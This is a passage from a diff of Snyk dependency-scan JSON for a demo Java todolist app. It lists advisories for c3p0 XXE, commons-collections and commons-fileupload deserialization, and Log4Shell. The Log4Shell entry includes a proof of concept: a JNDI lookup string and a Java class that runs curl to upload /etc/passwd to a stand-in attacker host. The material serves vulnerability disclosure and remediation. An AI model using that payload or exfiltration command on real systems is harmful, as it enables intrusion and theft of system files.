username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:20.019Z", + "expires": "2024-08-08T12:49:19.816Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:57.621Z", + "expires": "2024-08-08T12:48:57.394Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:03.652Z", + "expires": "2024-08-08T12:49:03.427Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[1.1,1.3.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", + "className": "DiskFileItem", + "functionName": "readObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", + "title": "NVD" + }, + { + "url": "http://www.tenable.com/security/research/tra-2016-12", + "title": "Tenable Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "assigner": "SUSE", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:58.367467Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", + "epssDetails": { + "percentile": "0.93419", + "probability": "0.05866", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-1000031" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-02-22T07:28:18.753000Z", + "functions_new": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.disk.DiskFileItem", + "functionName": "readObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-10-25T14:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-10-26T03:04:11.895000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:55.666846Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.37", + "commons-fileupload:commons-fileupload@1.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:17.345Z", + "expires": "2024-08-08T12:49:17.086Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": "GitHub PR" + }, + { + "url": "https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
